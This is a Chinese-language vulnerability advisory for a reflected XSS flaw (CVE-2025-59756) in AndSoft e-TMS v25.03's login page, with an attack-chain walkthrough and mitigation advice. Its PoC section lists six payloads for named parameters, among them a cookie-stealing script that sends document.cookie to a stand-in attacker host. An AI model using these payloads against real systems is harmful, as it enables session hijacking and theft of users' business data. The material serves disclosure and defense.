CVE-2025-59756：AndSoft e-TMS 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59756

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59756是AndSoft公司开发的e-TMS（运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所（INCIBE）披露，CVSS 3.1评分为6.1分，属于中危级别。e-TMS是一款广泛用于物流和运输行业的管理软件，处理大量敏感的业务数据，包括客户信息、运输订单、财务记录等。该漏洞存在于系统的登录页面/clt/LOGINFRM_CON.ASP中，具体涉及多个URL参数，包括'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'以及'SuppConn'参数。攻击者可以通过构造包含恶意JavaScript代码的特殊URL，利用这些未经过滤的参数进行注入。当受害者点击或访问该恶意链接时，恶意脚本将在受害者的浏览器上下文中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击或恶意操作等安全风险。由于该漏洞无需认证即可利用，但需要用户交互（点击恶意链接），因此攻击者通常需要通过社会工程学手段（如邮件、即时消息等）诱导受害者访问恶意URL。INCIBE建议用户尽快更新到修复版本以消除此安全隐患。

技术细节

该漏洞的根源在于AndSoft e-TMS v25.03的登录页面/clt/LOGINFRM_CON.ASP对用户输入参数缺乏充分的输出编码和过滤机制。具体而言，'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'这六个参数在处理过程中直接将用户提供的输入反射回HTTP响应页面，而未对HTML特殊字符（如<、>、"、'、&等）进行适当的转义或编码。攻击者可以利用这一缺陷，在URL参数中注入任意的JavaScript代码片段。当受害者通过浏览器访问包含恶意参数的URL时，服务器会将恶意代码原样嵌入返回的HTML页面中，浏览器随后解析并执行这些脚本。由于该漏洞属于反射型XSS，恶意代码不会持久化存储在服务器端，而是仅在受害者访问特定恶意链接时触发执行。攻击者可以利用此漏洞执行多种恶意操作，包括但不限于：窃取用户的会话Cookie和身份验证令牌、重定向用户到钓鱼页面、在受害者上下文中执行未授权操作（如以受害者身份提交表单）、读取或修改页面DOM内容、记录键盘输入等。CVSS向量显示该漏洞具有网络攻击向量（AV:N）、低攻击复杂度（AC:L）、无需权限（PR:N）、需要用户交互（UI:R）、作用域改变（S:C），对机密性和完整性产生低影响。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过公开渠道或Shodan等搜索引擎识别暴露在互联网上的AndSoft e-TMS v25.03实例，确定目标系统的登录页面/clt/LOGINFRM_CON.ASP可访问。

STEP 2

步骤2：漏洞探测

攻击者向目标URL的SuppConn、l、demo、demo2、TNTLOGIN、UO等参数注入测试性XSS Payload（如<script>alert(1)</script>），观察响应中是否原样反射未编码的用户输入。

STEP 3

步骤3：恶意Payload构造

攻击者构造包含恶意JavaScript代码的URL，如窃取Cookie的脚本、重定向到钓鱼页面的代码或执行未授权操作的脚本，并将其嵌入精心设计的诱饵信息中。

STEP 4

步骤4：社会工程诱导

攻击者通过电子邮件、即时消息、社交媒体或其他通信渠道向e-TMS的目标用户发送包含恶意URL的链接，利用社会工程学手段诱导受害者点击。

STEP 5

步骤5：恶意代码执行

受害者点击恶意链接后，浏览器向e-TMS服务器发起请求，服务器将包含恶意脚本的HTML页面返回，浏览器解析并执行嵌入的JavaScript代码。

STEP 6

步骤6：数据窃取与权限滥用

恶意脚本在受害者会话上下文中执行，窃取会话Cookie、身份令牌等敏感信息，或以受害者身份执行未授权操作（如修改运输订单、访问敏感业务数据等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59756 - AndSoft e-TMS Reflected XSS PoC
# Vulnerable endpoint: /clt/LOGINFRM_CON.ASP
# Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn

import requests

TARGET_URL = "https://target.example.com/clt/LOGINFRM_CON.ASP"

# PoC 1: XSS via 'SuppConn' parameter
PAYLOAD_1 = ""><script>alert('XSS-CVE-2025-59756')</script>"
url_1 = f"{TARGET_URL}?SuppConn={PAYLOAD_1}"

# PoC 2: XSS via 'l' parameter
PAYLOAD_2 = "<img src=x onerror=alert(document.domain)>"
url_2 = f"{TARGET_URL}?l={PAYLOAD_2}"

# PoC 3: XSS via 'demo' parameter with cookie stealing
STEALER_HOST = "https://attacker.example.com/steal"
PAYLOAD_3 = f"<script>fetch('{STEALER_HOST}?c='+document.cookie)</script>"
url_3 = f"{TARGET_URL}?demo={PAYLOAD_3}"

# PoC 4: XSS via 'TNTLOGIN' parameter
PAYLOAD_4 = "<svg/onload=alert('XSS')>"
url_4 = f"{TARGET_URL}?TNTLOGIN={PAYLOAD_4}"

# PoC 5: XSS via 'UO' parameter
PAYLOAD_5 = "javascript:alert('XSS-CVE-2025-59756')"
url_5 = f"{TARGET_URL}?UO={PAYLOAD_5}"

# PoC 6: XSS via 'demo2' parameter
PAYLOAD_6 = "'-alert('XSS')-'"
url_6 = f"{TARGET_URL}?demo2={PAYLOAD_6}"

def verify_xss(url, payload_name):
    """Send request and check if payload is reflected without sanitization"""
    try:
        response = requests.get(url, timeout=10, verify=False)
        if payload_name in response.text:
            print(f"[+] VULNERABLE: Payload '{payload_name}' reflected in response")
            print(f"    URL: {url}")
            return True
        else:
            print(f"[-] NOT VULNERABLE: Payload '{payload_name}' not reflected")
            return False
    except Exception as e:
        print(f"[!] ERROR: {e}")
        return False

if __name__ == "__main__":
    print("=== CVE-2025-59756 XSS Vulnerability Checker ===")
    print(f"Target: {TARGET_URL}\n")
    
    verify_xss(url_1, "alert('XSS-CVE-2025-59756')")
    verify_xss(url_2, "onerror=alert")
    verify_xss(url_4, "alert('XSS')")
    
    print("\n[!] WARNING: Only use this PoC for authorized security testing!")

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方修复版本发布前，建议采取以下临时缓解措施：1）在Web应用防火墙（WAF）或反向代理层面部署XSS防护规则，对包含常见XSS特征（如<script>、onerror=、javascript:等）的请求进行拦截；2）配置Content Security Policy（CSP）头，限制内联脚本执行，例如设置Content-Security-Policy: default-src 'self'; script-src 'self';；3）为所有会话Cookie添加HTTPOnly属性，防止JavaScript访问；4）对e-TMS登录页面/clt/LOGINFRM_CON.ASP的访问进行监控，记录可疑请求；5）加强用户安全意识培训，警告用户不要点击来源可疑的链接，特别是涉及e-TMS系统的URL；6）如非必要，可考虑限制/clt/LOGINFRM_CON.ASP页面的互联网暴露，仅允许通过VPN或内网访问。